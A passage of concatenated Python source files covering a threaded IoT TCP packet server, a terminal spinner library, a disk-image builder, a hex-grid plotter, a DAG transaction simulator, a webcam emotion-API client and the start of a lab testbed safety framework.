def jsonPackDeserialize(self, raw_data):
# return ujson.loads(raw_data.decode("utf-8"))
return json.loads(raw_data.decode("utf-8"))
def sendAckPacket(self):
ack = "ok".encode()
self.request.send(ack)
def packets_recv(self):
#for i in range(0, 9):
self.transfer_counter += 1
#
self.printCurThreadInfo()
while True:
# Receive hello pack from the client
raw_data = self.request.recv(8196)
#print(raw_data.decode("utf-8"))
# pack deserialize
packet = self.jsonPackDeserialize(raw_data)
# update changes section in iot_dev objects
#self.updateDataInRSDB(packet)
# save packet to DB1
self.addPacketToDB1(packet)
# read packets from DB2
packets = self.readAllPacketsFromDB2()
# check up the packets in DB2
if self.isPacketsExists(packets):
# send packets from DB2 to tcp client
self.sendPacketsFromWS(packets)
# clear DB2
self.clearDB2()
# save packet to DB3
self.addPacketToDB3(packet)
'''
if packet["type"] == "dev_hello":
print("DEV_HELLO")
if packet["type"] == "dev_changes":
print("DATA")
'''
#data = ujson.loads(raw_data.decode())
#data = raw_data.decode("utf-8")
#self.logger.debug('recv()-> "%s"', data)
self.printPacketInNormalView(packet)
# send ack
self.sendAckPacket()
# successful transfer
self.normal_packets_counter += 1
def reluanchHandling(self, e):
self.broken_packets_counter += 1
#self.broken_packets_transfer_stat = (self.broken_packets_counter / self.transfer_counter) * 100
self.broken_packets_transfer_stat = (1 - (self.normal_packets_counter / self.transfer_counter)) * 100
print("DEBUG: broken_packets_transfer_statistics = ", self.broken_packets_transfer_stat, "%")
print("LOG: TCP_SERVER Time: ",
dt.datetime.now(tz=None), " Error_Msg: ", e)
self.handle()
def transferDataFromDIDS(self):
self.logger.debug('handle')
#
#self.transfer_counter += 1
#
try:
self.packets_recv()
# except (simplejson.decoder.JSONDecodeError, json.decoder.JSONDecodeError) as e:
except ValueError as e:
self.broken_packets_counter += 1
# self.broken_packets_transfer_stat = (self.broken_packets_counter / self.transfer_counter) * 100
self.broken_packets_transfer_stat = (1 - (self.normal_packets_counter / self.transfer_counter)) * 100
print("DEBUG: broken_packets_transfer_statistics = ", self.broken_packets_transfer_stat, "%")
print("LOG: TCP_SERVER (tcp_server_crashed_counter = ", self.broken_packets_counter, " Time: ",
dt.datetime.now(tz=None), " Error_Msg: ", e)
self.handle()
except (ConnectionAbortedError, ConnectionResetError) as e:
#self.reluanchHandling(e)
pass
except Exception as e:
self.reluanchHandling(e)
'''
def addClientToClientsList(self):
print("recv data from client: ", self.client_address)
'''
def launchClientHandling(self):
# add client to list
#self.addClientToClientsList()
# transfer data from distribution iot-devices system
self.transferDataFromDIDS()
def printCurThreadInfo(self):
curThread = thrd.currentThread()
print("Name of current thread", curThread.getName())
def handle(self):
# Start client handling in a thread
#t = thrd.Thread(target=self.launchClientHandling, args=(self,))
# t.setDaemon(True) # don't hang on exit
#t.start()
#
self.printCurThreadInfo()
#
self.launchClientHandling()
return
def finish(self):
self.logger.debug('finish')
return socketserver.BaseRequestHandler.finish(self)
#class TCPServer(socketserver.TCPServer, SocketServer.ForkingMixIn):
class TCPServer(socketserver.TCPServer, socketserver.ThreadingMixIn):
#class TCPServer(socketserver.TCPServer):
def __init__(self, server_address,
handler_class=RequestsHandler,
):
self.logger = logging.getLogger('TCP_Server')
self.logger.debug('__init__')
socketserver.TCPServer.__init__(self, server_address,
handler_class)
#
self._clients = dict()
#
self._clientsCount = 0
#
#self._handlingMode = TcpRequestsHandlingMode.SINGLETHREADING
self._handlingMode = TcpRequestsHandlingMode.MULTITHREADING
return
def getClientsList(self):
return self._clients
def setClientsList(self, clients):
self._clients = clients
def add_client(self, network_addr, con_sock):
# add client ( net_addr : list(socket, thread, datetime) )
incomingTime = dt.datetime.now()
self._clients.update({network_addr: [con_sock, None, incomingTime]})
# refreash count of clients
self._clientsCount = len(self._clients)
print("---------------------------------------------------")
print("add new client --- NetAddr: ", network_addr, " (Sock: ", con_sock, " , Descriptor of thread: ", None,
", client connecting time: ", incomingTime,
")")
print("---------------------------------------------------")
def printClientsList(self):
print("Clients count: ", self._clientsCount)
print("Clients list:")
for client in self._clients:
#print("NetAddr: ", client, " ClientCntx: sock = ", self._clients[client][0], " thread_desc = ", self._clients[client][1])
print("NetAddr: ", client, " ClientCntx: sock = ", self._clients[client][0])
print(" thread_desc = ", self._clients[client][1])
print(" client connecting time = ", self._clients[client][2])
'''
Called by the server’s constructor to bind the socket to the desired address. May be overridden.
'''
def server_bind(self):
self.logger.debug('server_bind')
socketserver.TCPServer.server_bind(self)
return
'''
Called by the server’s constructor to activate the server. The default behavior for a TCP server just invokes
listen() on the server’s socket. May be overridden.
'''
def server_activate(self):
self.logger.debug('server_activate')
socketserver.TCPServer.server_activate(self)
return
'''
Return an integer file descriptor for the socket on which the server is listening. This function is most commonly
passed to selectors, to allow monitoring multiple servers in the same process.
'''
def fileno(self):
self.logger.debug('fileno')
return socketserver.TCPServer.fileno(self)
'''
This is called in the serve_forever() loop. This method can be overridden by subclasses or mixin classes to
perform actions specific to a given service, such as cleanup actions.
'''
def service_actions(self):
# call each second (should use for redis db check up)
self.logger.debug('servive_actions')
# printing clients list
self.printClientsList()
socketserver.TCPServer.service_actions(self)
return
'''
Handle requests until an explicit shutdown() request. Poll for shutdown every poll_interval seconds. Ignores
the timeout attribute. It also calls service_actions(), which may be used by a subclass or mixin to provide
actions specific to a given service. For example, the ForkingMixIn class uses service_actions() to clean up
zombie child processes.
'''
def serve_forever(self, poll_interval=0.5):
self.logger.debug('waiting for request')
self.logger.info(
'Handling requests, press <Ctrl-C> to quit'
)
socketserver.TCPServer.serve_forever(self, poll_interval)
return
'''
Process a single request. This function calls the following methods in order: get_request(), verify_request(),
and process_request(). If the user-provided handle() method of the handler class raises an exception, the
server’s handle_error() method will be called. If no request is received within timeout seconds, handle_timeout()
will be called and handle_request() will return.
'''
def handle_request(self):
self.logger.debug('handle_request')
return socketserver.TCPServer.handle_request(self)
'''
This function is called if the handle() method of a RequestHandlerClass instance raises an exception. The default
action is to print the traceback to standard output and continue handling further requests.
'''
def handle_error(self, request, client_address):
self.logger.debug('handle_error')
return socketserver.TCPServer.handle_error(self, request, client_address)
'''
This function is called when the timeout attribute has been set to a value other than None and the timeout period
has passed with no requests being received. The default action for forking servers is to collect the status of any
child processes that have exited, while in threading servers this method does nothing.
'''
def handle_timeout(self):
#self.logger.debug('handle_timeout')
pass
'''
Must accept a request from the socket, and return a 2-tuple containing the new socket object to be used to
communicate with the client, and the client’s address.
'''
def get_request(self):
self.logger.debug('get request')
return socketserver.TCPServer.get_request(self)
#return
'''
Must return a Boolean value; if the value is True, the request will be processed, and if it’s False, the request
will be denied. This function can be overridden to implement access controls for a server. The default
implementation always returns True.
'''
def verify_request(self, request, client_address):
self.logger.debug('verify_request(%s, %s)',
request, client_address)
#
print("client_address = ", client_address)
self.add_client(client_address, request)
return socketserver.TCPServer.verify_request(
self, request, client_address,
)
def process_request_thread(self, request, client_address):
pass
def process_request_multithreading(self, request, client_address):
print("multithreading requests handling")
t = thrd.Thread(target=socketserver.TCPServer.process_request, args=(self, request, client_address,))
# add descriptor of thread
self._clients[client_address][1] = t
return t.start()
#return t
def process_request_singlethreading(self, request, client_address):
return socketserver.TCPServer.process_request(
self, request, client_address,
)
'''
Calls finish_request() to create an instance of the RequestHandlerClass. If desired, this function can create
a new process or thread to handle the request; the ForkingMixIn and ThreadingMixIn classes do this.
'''
def process_request(self, request, client_address):
self.logger.debug('process_request(%s, %s)',
request, client_address)
#self.add_client(client_address, request)
if self._handlingMode == TcpRequestsHandlingMode.SINGLETHREADING:
return self.process_request_singlethreading(request, client_address)
else:
return self.process_request_multithreading(request, client_address)
'''
Clean up the server. May be overridden.
'''
def server_close(self):
self.logger.debug('server_close')
return socketserver.TCPServer.server_close(self)
'''
delete client from general client's list by ipv4 address
'''
def del_client(self, request_address):
# get thread descriptor
#t = self._clients[request_address][1]
# thread shutdown
#t.join()
#print("close thread for client: ", request_address)
#self._clients[request_address][1].join()
# delete client
del self._clients[request_address]
outcomingTime = dt.datetime.now()
print("[", outcomingTime, "] client with address [", request_address, "] was deleted from list")
'''
delete client from general client's list by socket descriptor
'''
def del_client_by_sock(self, sockDesc):
try:
for key, value in self._clients.items():
if value[0] == sockDesc:
print("closing socket: ", value[0], " and shutdown the thread: ", value[1])
# get thread descriptor
#t = value[1]
# thread shutdown
#t.join()
print("client with address [", key, "] was deleted from list")
del self._clients[key]
# update the size of client's list
self._clientsCount = len(self._clients)
#
#print("client with address [IPv4: ", key1, " port: ", key2, "] was deleted from list")
except RuntimeError as e:
print(e)
'''
Actually processes the request by instantiating RequestHandlerClass and calling its handle() method.
'''
def finish_request(self, request, client_address):
self.logger.debug('finish_request(%s, %s)',
request, client_address)
return socketserver.TCPServer.finish_request(
self, request, client_address,
)
'''
close socket when client was disconnecting
'''
def close_request(self, request_address):
self.logger.debug('close_request(%s)', request_address)
# delete client
#self.del_client(request_address)
# del client from general list by socket descriptor
self.del_client_by_sock(request_address)
return socketserver.TCPServer.close_request(
self, request_address,
)
'''
delete all clients from the list
'''
def clearClientsList(self):
self._clientsCount = 0
self._clients.clear()
'''
Tell the serve_forever() loop to stop and wait until it does.
'''
def shutdown(self):
# clear general clients list
self.clearClientsList()
self.logger.debug('shutdown()')
return socketserver.TCPServer.shutdown(self)
#class ThreadedTCPServer(socketserver.ThreadingMixIn, socketserver.TCPServer):
class ThreadedTCPServer:
def __init__(self, curServPort=3333):
self._logger = logging.getLogger('server')
self._curIP = sock.gethostbyname(sock.gethostname())
# curIP = "192.168.0.27"
# print("IP = ", curIP)
self._curServPort = curServPort
def run(self):
# address = (curIP, 0) # let the kernel assign a port
address = (self._curIP, self._curServPort) # custom assign a port
# address = ("localhost", curServPort) # custom assign a port
server = TCPServer(address, RequestsHandler)
ip, port = server.server_address # what port was assigned?
# Start the server in a thread
t = thrd.Thread(target=server.serve_forever)
#t.setDaemon(True) # don't hang on exit
t.start()
print('Server loop running in process: PID = ', os.getpid())
self._logger.info('Server on SERVER_IPv4: %s and PORT: %s', ip, port)
# Clean up
# server.shutdown()
# logger.debug('closing socket')
# logger.debug('done')
# server.socket.close()
if __name__ == '__main__':
threadingTCPServer = ThreadedTCPServer()
threadingTCPServer.run()
|
display.py
|
"""Simple display library for check-your-pulse."""
# Standard Python Libraries
import itertools
import os
import shutil
import sys
import threading
import time
class Color:
"""Provide us with a means of making colored text."""
@staticmethod
def _red(line: str) -> str:
return f"\x1b[1;31m{line}\x1b[0m"
@staticmethod
def _green(line: str) -> str:
return f"\x1b[1;32m{line}\x1b[0m"
@staticmethod
def _blue(line: str) -> str:
return f"\x1b[1;34m{line}\x1b[0m"
@staticmethod
def _violet(line: str) -> str:
return f"\x1b[1;35m{line}\x1b[0m"
@staticmethod
def _yellow(line: str) -> str:
return f"\x1b[1;33m{line}\x1b[0m"
# Much of this code was bitten from the great yaspin library. We wanted to do some animation without our customers
# needing to install an external library, so we modified their spinner and got rid of things we didn't need for this
# use case.
# Check them out here: https://github.com/pavdmyt/yaspin
class Animation(Color):
"""Provide us with a means of making a spinner."""
def __init__(self, text: str = ""):
"""
Instantiate the Animation class, then the animation can be started with Animation.start(text).
:param text: Text displayed to the right of the animation.
"""
super().__init__()
self._cycle = itertools.cycle(
[
"[ C]",
"[ CI]",
"[ CIS]",
"[CISA]",
"[ISA ]",
"[SA ]",
"[A ]",
"[ ]",
]
)
self._stop_animation = threading.Event()
self._stdout_lock = threading.Lock()
self._animation_thread = threading.Thread()
self.text: str = f" {text}"
def _animation(self) -> None:
"""
Run background thread started by start() and interrupted by done() or error().
Returns:
None
"""
while not self._stop_animation.is_set():
spin_phase = next(self._cycle)
if os.name != "nt":
out = self._blue(spin_phase) + self.text
else:
out = spin_phase + self.text
with self._stdout_lock:
_clear_console()
sys.stdout.write(out)
sys.stdout.flush()
time.sleep(0.1)
def start(self, text: str = "") -> None:
"""
Start the background thread for our animation.
Args:
text (str), Optional: Text to print to the terminal after the animation.
Returns:
None
"""
self._text_format(text)
self._stop_animation = threading.Event()
self._animation_thread = threading.Thread(target=self._animation)
self._animation_thread.start()
def done(self, text: str = "") -> None:
"""
Stop our background thread and print a green [Done] in place of the animation.
Args:
text (str), Optional: Text to print after [Done].
Returns:
None
"""
self._text_format(text)
if self._animation_thread:
self._stop_animation.set()
self._animation_thread.join()
_clear_console()
if os.name != "nt":
print(self._green("[Done]") + self.text)
else:
print("[Done]" + self.text)
sys.stdout.write("\r")
def error(self, text: str = "") -> None:
"""
Stop our background thread and print a red [Error] in place of the animation.
Args:
text (str), Optional: Text to print after [Error].
Returns:
None
"""
self._text_format(text)
if self._animation_thread:
self._stop_animation.set()
self._animation_thread.join()
_clear_console()
if os.name != "nt":
print(self._red("[Error]") + self.text)
else:
print("[Error]" + self.text)
def update(self, text: str = "") -> None:
"""
Update the text in the animation.
Args:
text (str): Text next to the animation.
Returns:
None
"""
self.text = f" {text}"
def _text_format(self, text):
if text:
term_size = shutil.get_terminal_size(fallback=(80, 24)).columns
if len(text) > term_size:
text = text[0 : (term_size - 15)]
text += " ..."
self.text = f" {text}"
@staticmethod
def _hide_cursor():
if os.name != "nt":
sys.stdout.write("\033[?25l")
sys.stdout.flush()
@staticmethod
def _show_cursor():
if os.name != "nt":
sys.stdout.write("\033[?25h")
sys.stdout.flush()
def _clear_console():
if os.name != "nt":
sys.stdout.write("\033[2K\033[1G")
sys.stdout.write("\r")
def _center(line):
term_size = shutil.get_terminal_size(fallback=(80, 24)).columns
line_len = len(line)
return int((term_size - line_len) / 2)
ascii_art = """
_ _ _
| | | | | |
___| |__ ___ ___| | ________ _ _ ___ _ _ _ __ ______ _ __ _ _| |___ ___
/ __| '_ \\ / _ \\/ __| |/ /______| | | |/ _ \\| | | | '__|______| '_ \\| | | | / __|/ _ \
| (__| | | | __/ (__| < | |_| | (_) | |_| | | | |_) | |_| | \\__ \\ __/
\\___|_| |_|\\___|\\___|_|\\_\\ \\__, |\\___/ \\__,_|_| | .__/ \\__,_|_|___/\\___|
__/ | | |
|___/ |_| \n
"""
|
image-builder.py
|
#!/usr/bin/python3
import os
import sys
import re
import yaml
import threading
#################################
# Util
#################################
class ThreadPool:
def __init__(self):
self._threads = []
def add_thread(self, proc):
thrd = threading.Thread(target=proc)
thrd.start()
self._threads.append(thrd)
def join(self):
for thrd in self._threads:
thrd.join()
self._threads.clear()
def c(cmd, expected=[0]):
print(cmd)
assert os.system(cmd) in expected
#################################
# Partition
#################################
def create_using_parted(t):
def create(config):
c(f"parted {config['file']} -s -a minimal mktable {t}")
return create
image_parition = {
'gpt': create_using_parted('gpt'),
'mbr': create_using_parted('mbr'),
}
#################################
# FS
#################################
def create_fat(size):
def create(parition):
c(f'mkfs.fat -F{size} -s 1 part{parition["num"]}.img')
return create
def create_ext(typ):
def create(partition):
c(f'mke2fs -t ext{typ} part{partition["num"]}.img')
return create
def create_echfs(parition):
c(f'echfs-utils part{parition["num"]}.img format 512')
image_fs = {
'fat12': create_fat(12),
'fat16': create_fat(16),
'fat32': create_fat(32),
'ext2': create_ext(2),
'ext3': create_ext(3),
'ext4': create_ext(4),
'echfs': create_echfs,
}
#################################
# Move files
#################################
def copy_fat(partition):
partpath = os.path.abspath(f'part{partition["num"]}.img')
if len(os.listdir(partition["content"])) != 0:
files = "\" \"".join(os.listdir(partition["content"]))
c(f'cd {partition["content"]} && mcopy -s -b -i {partpath} -D overwrite "{files}" ::')
def copy_ext(partition):
for subdir, dirs, files in os.walk(partition['content']):
for d in dirs:
c(f'e2mkdir part{partition["num"]}.img:{os.path.join(subdir, d)[len(partition["content"]):]}')
for f in files:
c(f'e2cp {os.path.join(os.path.abspath(subdir), f)} part{partition["num"]}.img:{os.path.join(subdir, f)[len(partition["content"]):]}')
def copy_echfs(partition):
for subdir, dirs, files in os.walk(partition['content']):
for d in dirs:
c(f'echfs-utils part{partition["num"]}.img mkdir {os.path.join(subdir, d)[len(partition["content"]):]}')
for f in files:
c(f'echfs-utils part{partition["num"]}.img import {os.path.join(os.path.abspath(subdir), f)} {os.path.join(subdir, f)[len(partition["content"]):]}')
copy_files = {
'fat12': copy_fat,
'fat16': copy_fat,
'fat32': copy_fat,
'ext2': copy_ext,
'ext3': copy_ext,
'ext4': copy_ext,
'echfs': copy_echfs
}
#################################
# Parsing
#################################
size_shift = {
'M': 11,
'G': 21,
}
def main(args):
if len(args) <= 1:
print(f"Usage: {args[0]} <config> [alternative file]")
else:
with open(args[1], 'rb') as f:
config = yaml.load(f.read(), Loader=yaml.FullLoader)
# File override
if len(args) > 2:
config['file'] = args[2]
threads = ThreadPool()
#
# Get the image config
#
assert 'file' in config, "No filename given :("
assert 'size' in config, "No size given :("
ofile = config['file']
#
# Get the size
#
size_unit = config['size'][-1]
size_num = int(config['size'][:-1])
assert size_unit in size_shift, f"Invalid size unit {size_unit}"
disk_sectors = size_num << size_shift[size_unit]
#
# Parse the configuration to get a list of partitions
#
partitions = []
partition_start = 2048
assert 'partitions' in config, "No partitions in config :("
for partition in config['partitions']:
assert 'fs' in partition, f"No filesystem given for partition in part {len(partitions)} :("
assert partition['fs'] in image_fs, f"Invalid filesystem type {partition['fs']}, supported {image_fs.keys()} :("
assert 'size' in partition, f"No size given for partition in part {len(partitions)} :("
# Calculate size
if partition['size'] == 'fit':
sectors = disk_sectors - partition_start - 2048 + 1
else:
part_size_unit = partition['size'][-1]
part_size_num = int(partition['size'][:-1])
assert part_size_unit in size_shift, f"Invalid size unit {size_unit} in part {len(partitions)} :("
sectors = part_size_num << size_shift[size_unit]
partitions.append({
'num': len(partitions),
'start': partition_start,
'end': partition_start + sectors,
'size': sectors,
'fs': partition['fs'],
'bootable': partition['bootable'] if 'bootable' in partition else False,
'content': partition['content'] if 'content' in partition else None,
'label': partition['label'] if 'label' in partition else None,
})
partition_start += sectors
#
# If the output file does not exists then create a new device with the correct
# partitions, if it does exist we are going to assume the partitions are correct
# TODO: maybe don't assume lol
#
if not os.path.exists(ofile):
# Create the image itself
c(f"dd if=/dev/zero of={ofile} bs=1{size_unit} count={config['size'][:-1]}")
# Partition the image
assert 'type' in config, "No parition type give :("
assert config['type'] in image_parition, f"Unsupported partition type {config['type']}, supported: {image_parition.keys()} :("
image_parition[config['type']](config)
num = 1
for partition in partitions:
if partition['fs'] in ['echfs']:
c(f'parted {ofile} -s -a minimal mkpart {partition["label"]} {partition["start"]}s {partition["end"] - 1}s')
else:
c(f'parted {ofile} -s -a minimal mkpart {partition["label"]} {partition["fs"]} {partition["start"]}s {partition["end"] - 1}s')
if 'bootable' in partition and partition['bootable']:
c(f"parted {ofile} -s -a minimal toggle {num} boot")
num += 1
for partition in partitions:
threads.add_thread(lambda: c(f"dd if=/dev/zero of=part{partition['num']}.img bs=512 count={partition['size']}"))
threads.join()
for partition in partitions:
threads.add_thread(image_fs[partition['fs']](partition))
threads.join()
#
# If the file does not exists then
#
else:
# Convert to a raw image so we can extract the partitions
if config['file'].endswith('.vmdk'):
c(f'qemu-img convert -f vmdk -O raw {config["file"]} {config["file"]}')
elif config['file'].endswith('.vdi'):
c(f'qemu-img convert -f vdi -O raw {config["file"]} {config["file"]}')
# extract all of the partitions
for partition in partitions:
threads.add_thread(lambda: c(f'dd if={ofile} of=part{partition["num"]}.img bs=512 skip={partition["start"]} count={partition["size"]}'))
threads.join()
# copy all of the files (will not delete ones)
for partition in partitions:
if partition['content'] is not None:
threads.add_thread(lambda: copy_files[partition['fs']](partition))
threads.join()
# Cleanup all of the left over partitions
for partition in partitions:
c(f'dd if=part{partition["num"]}.img of={ofile} bs=512 seek={partition["start"]} count={partition["size"]} conv=notrunc')
os.unlink(f'part{partition["num"]}.img')
# convert to the wanted image
if config['file'].endswith('.vmdk'):
c(f'qemu-img convert -f raw -O vmdk {config["file"]} {config["file"]}')
elif config['file'].endswith('.vdi'):
c(f'qemu-img convert -f raw -O vdi {config["file"]} {config["file"]}')
if __name__ == "__main__":
main(sys.argv)
|
plot_pil.py
|
# coding=utf-8
import threading
import numpy as np
import os
import time
import imageio
import errno
from PIL import Image, ImageDraw, ImageFont
axial_to_pixel_mat = np.array([[3 / 2., 0], [np.sqrt(3) / 2.0, np.sqrt(3)]])
# Circles in 24x24 bounding boxes
CIRCLE_BOUNDING = np.array([24, 24])
# Circles 24 apart
CIRCLE_DIST = 24
# Edges 4px wide
EDGE_WIDTH = 4
# Text size as a multiple of the screen height
TEXT_FACTOR = 100.0
def mkdir_p(path):
try:
os.makedirs(path)
except OSError as exc: # Python >2.5
if exc.errno == errno.EEXIST and os.path.isdir(path):
pass
else:
raise
def save_plt(plot, filename):
plot.save(filename)
plot.close()
class RasterPlotter(object):
def __init__(self, compression_simulator, path=None, gif_path=None):
self.compression_simulator = compression_simulator
self.min_pos = axial_to_pixel_mat.dot(compression_simulator.grid.min - np.array([1, 1])) * CIRCLE_DIST
self.max_pos = axial_to_pixel_mat.dot(compression_simulator.grid.max + np.array([1, 1])) * CIRCLE_DIST
self.size = (self.max_pos - self.min_pos).astype(int)
self.center = self.size / 2
# self.font = FONT
self.font = ImageFont.truetype(os.path.join(os.path.dirname(os.path.realpath(__file__)), "cmunorm.ttf"),
int(self.size[1] / TEXT_FACTOR))
if path is None:
path = os.path.join("output", type(self.compression_simulator).__name__, str(int(time.time())))
if gif_path is None:
gif_path = os.path.join(path, "result.gif")
if callable(path):
self.path = path()
else:
self.path = path
mkdir_p(self.path)
self.gif_path = gif_path
self.gif_writer = imageio.get_writer(self.gif_path, mode="I", duration=0.5)
self.closed = False
def get_position_from_axial(self, axial_coordinates):
return axial_to_pixel_mat.dot(axial_coordinates) * CIRCLE_DIST + self.center
def draw_plot(self):
if self.closed:
raise ValueError("This plotter has been closed.")
plt = Image.new('RGB', tuple(self.size), (255, 255, 255))
draw = ImageDraw.Draw(plt)
drawn_hexagons = {}
for key in xrange(len(self.compression_simulator.grid.extrema)):
extremum = self.compression_simulator.grid.extrema[key]
pos = self.get_position_from_axial(extremum)
draw.ellipse([tuple(pos - (CIRCLE_BOUNDING / 2)), tuple(pos + (CIRCLE_BOUNDING / 2))], (255, 0, 0))
neighbor_extremum = self.compression_simulator.grid.extrema[key - 1]
neighbor_pos = self.get_position_from_axial(neighbor_extremum)
draw.line([tuple(pos), tuple(neighbor_pos)], (255, 0, 0), EDGE_WIDTH)
if True:
# This part draws the particles & their links
for particle in self.compression_simulator.grid.get_all_particles():
position = self.get_position_from_axial(particle.axial_coordinates)
# Draw lines to neighbors
neighbors_positions = [self.get_position_from_axial(neighbor.axial_coordinates) for neighbor in
self.compression_simulator.grid.get_neighbors(particle.axial_coordinates) if
neighbor not in drawn_hexagons]
tuple_position = tuple(position)
for neighbor_position in neighbors_positions:
draw.line([tuple_position, tuple(neighbor_position)], (100, 100, 100), EDGE_WIDTH)
draw.ellipse([tuple(position - (CIRCLE_BOUNDING / 2)), tuple(position + (CIRCLE_BOUNDING / 2))],
particle.get_color())
# draw.text(tuple(position), "%.2f" % particle.bias if hasattr(particle, "bias") else "N/A", (0,0,0), self.font)
drawn_hexagons[particle] = True
start = self.get_position_from_axial(self.compression_simulator.grid.max)
start = np.array([self.size[0] - start[0], start[1]])
shift = (np.array([0, self.size[1]]) * 1.1 / TEXT_FACTOR).astype(int)
metrics = self.compression_simulator.get_metrics()
metric_count = len(metrics)
for key in xrange(metric_count):
metric = metrics[key]
metrictext = metric[0] + ": " + (metric[1] % metric[2])
draw.text(tuple(start - shift * (metric_count - key)), metrictext, (0, 0, 0), self.font)
start = self.get_position_from_axial(self.compression_simulator.grid.min)
start = np.array([self.size[0] - start[0], start[1]])
text = "Algorithm: %s" % type(self.compression_simulator).__name__
w, h = draw.textsize(text, self.font)
draw.text(start - np.array([w, 0]), text, (0, 0, 0), self.font)
start += shift
text = "Start time: %s" % self.compression_simulator.start_time
w, h = draw.textsize(text, self.font)
draw.text(start - np.array([w, 0]), text, (0, 0, 0), self.font)
return plt
def plot(self, filename):
plt = self.draw_plot()
self.gif_writer.append_data(np.array(plt))
# threading.Thread(target=save_plt, args=(plt, os.path.join(self.path, filename))).start()
save_plt(plt, os.path.join(self.path, filename))
def close(self):
plt = self.draw_plot()
for x in xrange(9):
self.gif_writer.append_data(np.array(plt))
self.gif_writer.close()
self.closed = True
# imageio.mimsave(self.gif_path, [np.asarray(x) for x in self.gif_writer], duration=0.5)
# for img in self.gif_writer:
# img.close()
|
Orchestrator.py
|
import threading
import matplotlib.pyplot as plt
from base.DAG import DAG
from base.CAC import DAG_C
import time
import random
startTime = 0
def getTime():
global startTime
if startTime == 0:
startTime = time.time()
timeNow = time.time()
time_ = timeNow - startTime
return int(time_)
def start_helper(sim):
global startTime
'''
:param sim: simulator object
:return: dag : DAG
'''
# Set plots for resulting dag image
plt.rc('axes', labelsize=20)
plt.rc('xtick', labelsize=20)
plt.rc('ytick', labelsize=20)
plt.figure(figsize=(25, 10))
if sim.algorithm == "cac":
# Call the DAG to generate transactions
dag = DAG_C(plot=True, numUsers=sim.numTotalUser, numMalUsers=sim.numMalUser, traPerUser=sim.traUser, reattachment=sim.nodeReattachment)
startTime = 0
threads = []
for userId in range(sim.numTotalUser):
threads.append(threading.Thread(target=cac_for_user, args=(dag, userId, sim.traUser)))
for t in threads:
t.start()
for t in threads:
t.join()
else:
# Call the DAG to generate transactions
dag = DAG(rate=sim.alpha, algorithm=sim.algorithm, plot=True)
for i in range(sim.transactions):
dag.generate_next_node()
# Return the result
return dag
def cac_for_user(dag, userId, transactionNum):
user = [u for u in dag.users if u.id == userId][0]
if user.malicious:
time.sleep(random.uniform(5, 12))
timee = getTime()
dag.generate_next_node(userId=userId, time=timee, malicious=True)
else:
for i in range(transactionNum):
timee = getTime()
dag.generate_next_node(userId=userId, time=timee)
time.sleep(random.uniform(1, 5))
dag.generate_next_node(userId=None, time=timee)
|
video_stream.py
|
from .face_capture import deep_convert
import cv2
import numpy as np
import json
import requests
import threading
import queue
que = queue.Queue()
def storeInQueue(f):
def wrapper(*args):
que.put(f(*args))
return wrapper
@storeInQueue
def get_tf_response(config, roi, model_mode):
max_idx = 5
max_percentage = 100
api = config['EMOTION_API']
push_data_json = wrap_data(roi)
if model_mode == 0:
max_idx, max_percentage = 5, 100
api = config['MOOD_API']
try:
request = requests.post(api, data=push_data_json, timeout=config['REQUEST_TIMEOUT']).text
response = json.loads(request)
if 'predictions' in response:
predictions = response['predictions'][0]
max_idx = np.argmax(predictions)
max_percentage = round(predictions[max_idx] * 100, 2)
else:
print(response)
return max_idx, max_percentage
except:
print('Catch error when requesting to apis')
return max_idx, max_percentage
def wrap_data(roi):
roi = cv2.resize(roi, (200, 200), interpolation=cv2.INTER_AREA)
output = cv2.cvtColor(roi, cv2.COLOR_BGR2GRAY)
output = output.reshape(1, 200, 200) / 255.
img_info = output.tolist()
data = {'instances': img_info}
push_data_json = json.dumps(data, sort_keys=True, separators=(',', ': '))
return push_data_json
def video_stream(config):
num_frames = 0
max_emotion_idx, max_mood_idx = 5, 1
max_emotion_percentage, max_mood_percentage = 100, 100
cap = cv2.VideoCapture(0)
threads = []
if not (cap.isOpened()):
print('Could not open video device')
else:
ret, frame = cap.read()
while ret:
found_face, roi = deep_convert(config, frame, (max_emotion_idx, max_mood_idx), (max_emotion_percentage, max_mood_percentage))
if found_face:
if num_frames % config['FRAMES_PER_REQUEST'] == 0:
mode = (num_frames / config['FRAMES_PER_REQUEST'] - 1) % 2
if len(threads) > 0:
threads[0].join()
threads.pop(0)
max_idx, max_percentage = que.get()
if mode == 0:
max_emotion_idx, max_emotion_percentage = max_idx, max_percentage
else:
max_mood_idx, max_mood_percentage = max_idx, max_percentage
t = threading.Thread(target=get_tf_response, args=(config, roi, mode))
t.setDaemon(True)
threads.append(t)
t.start()
num_frames += 1
# show the frame
cv2.imshow('Video Streaming', frame)
key = cv2.waitKey(1) & 0xFF
# if the `q` key was pressed, break from the loop
if key == ord('q'):
break
ret, frame = cap.read()
# When everything done, release the capture
cap.release()
cv2.destroyAllWindows()
return
|
experiment.py
|
from abc import ABC, abstractmethod
import logging
import os
import signal
import threading
from catkit import datalogging
from catkit.multiprocessing import DEFAULT_TIMEOUT, EXCEPTION_SERVER_ADDRESS, Process, SharedMemoryManager
from catkit.util import raise_signal
STOP_EVENT = "catkit_stop_event"
FINISH_EVENT = "catkit_soft_stop_event"
SAFETY_EVENT = "catkit_safety_event"
SAFETY_BARRIER = "catkit_safety_barrier"
class SafetyException(Exception):
pass
class StopException(Exception):
pass
class SafetyTest(ABC):
def __init__(self, *args, max_consecutive_failures=0, **kwargs):
super().__init__(*args, **kwargs)
self.name = None
self.log = logging.getLogger()
# Permit <max_consecutive_failures> consecutive failures before failing test and raising.
self.max_consecutive_failures = max_consecutive_failures
self.consecutive_failure_counter = 0
def do_check(self, force_raise=False):
try:
self.check()
except Exception as error:
if force_raise:
raise
self.consecutive_failure_counter += 1
if self.consecutive_failure_counter > self.max_consecutive_failures:
raise
else:
self.log.warning(f"Safety test warning issued for {self.name}: {error}")
else:
self.consecutive_failure_counter = 0
@abstractmethod
def check(self):
"""Implement to conduct safety check and raise a SafetyException upon failure. """
class Testbed:
""" Class for owning testbed infrastructure such as any shared memory servers and running safety checks. """
# NOTE: The following event isn't implicitly used nor waited upon, it's hosted here such that it can be imported.
STOP_EVENT = "stop the testbed running"
def __init__(self, safety_tests, output_path=None, suffix=None,
safety_check_interval=60):
"""
Parameters
----------
safety_tests : list
List of SafetyTest class defs, not already instantiated objects (nothing else should own these).
safety_check_interval : int, float, optional:
Time interval between calling check_safety().
output_path: str, optional
Output directory to write all files to (or to subdirectories thereof).
For the vast majority of use cases this should be left as None, in which
case it will be auto-generated based on date-time + suffix.
suffix : str, optional
Descriptive string to include as part of the path.
"""
self.log = None
self.output_path = output_path
self.suffix = suffix
self.init_path()
self.init_log()
